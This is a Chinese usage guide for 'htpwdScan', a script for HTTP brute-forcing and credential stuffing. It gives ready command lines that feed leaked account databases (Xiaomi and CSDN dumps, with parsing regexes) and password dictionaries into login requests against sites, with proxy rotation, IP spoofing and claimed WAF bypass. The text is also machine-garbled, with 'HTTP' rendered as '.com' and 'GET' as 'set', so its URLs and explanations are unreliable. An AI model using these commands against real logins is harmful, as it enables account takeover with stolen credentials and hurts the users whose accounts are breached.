htpwdScan 一个简单的HTTP暴力破解、撞库攻击脚本

"htpwdScan 是1个简易的.com暴力破解、撞库攻击脚本制作. 它的特点：

适用大批量校检并导进.com代理商，高频撞库能够取得成功进攻绝大多数网址，绕开绝大多数防御力对策和waf

适用立即导进互联网技术上泄漏的社工库，进行撞库攻击

适用导进超大型词典

简易实例

.com Basic验证

htpwdScan.py -u=.com://auth.58.Com/ -basic user.txt password.txt

导进登录名密码字典只能

表格破译

htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err=""success\"":false""

从 post2.txt 导进抓的.com包，user和passwd是必须破译的主要参数，而 user.txt password.txt 是储存了登陆密码的词典文档

success"":false 是挑选的不成功标识，标识中若有双引号，请还记得用右斜线 \ 转义

set主要参数破译

htpwdScan.py -d passwd=password.txt -u="".com://XXX.Com/index.Python?m=login&username=test&passwd=test"" -set -err=""success\"":false""

应用-set主要参数告诉他脚本制作此地是setpost请求

撞库攻击

htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex=""(\S+)\s+(\S+)"" -err=""登录名或登陆密码不正确"" -fip

htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex=""\S+ # (\S+) # (\S+)"" -err=""登录名或登陆密码不正确"" -fip

应用小米手机和csdn库进行撞库攻击。post.txt是抓包的.compost请求

主要参数-regex设置从文件获取主要参数的正则表达式，此地需排序，排序的方法是应用括号()

小米手机的统计数据行文件格式是 XXX@163.Com xxxxxxx 也即 (登录名)空白字符(登陆密码)

(\S+)\s+(\S+) 可特定第一位非空白字符拿来添充loginname，而下一个非空白页字符串拿来添充passwd

csdn的统计数据行文件格式是zdg # 12344321 # zdg@csdn.net . 正则表达式创作\S+ # (\S+) # (\S+)

第一位#后边的非空白页字符串添充passwd，下一个#后边的非空白页字符串添充loginname

温馨提醒，主要参数的次序是关键的

-fip 是开启仿冒任意iP

校检.com代理商

htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc=""登录名或登陆密码不正确""

要破译某一网址，大批量检测应用代理商是不是连接总体目标网址，把.compost请求储存到post.txt，随后用-suc主要参数设置连接标识

1个简易行得通的校检方法是：

htpwdScan.py -u=.com://WWW.baidu.Com -set -proxylist=available.txt -checkproxy -suc=""搜一下""

详细主要参数表明

脚本制作适用的小作用较多，请细心阅读文章下列详细表明。提议多应用 -debug 主要参数查询.compost请求是不是不太好，一切正常再进行真实的破译。

usage: htpwdScan.py [options]

* An .com weak pass scanner. By LiJieJie *

optional arguments:

  -h, --help           显示信息协助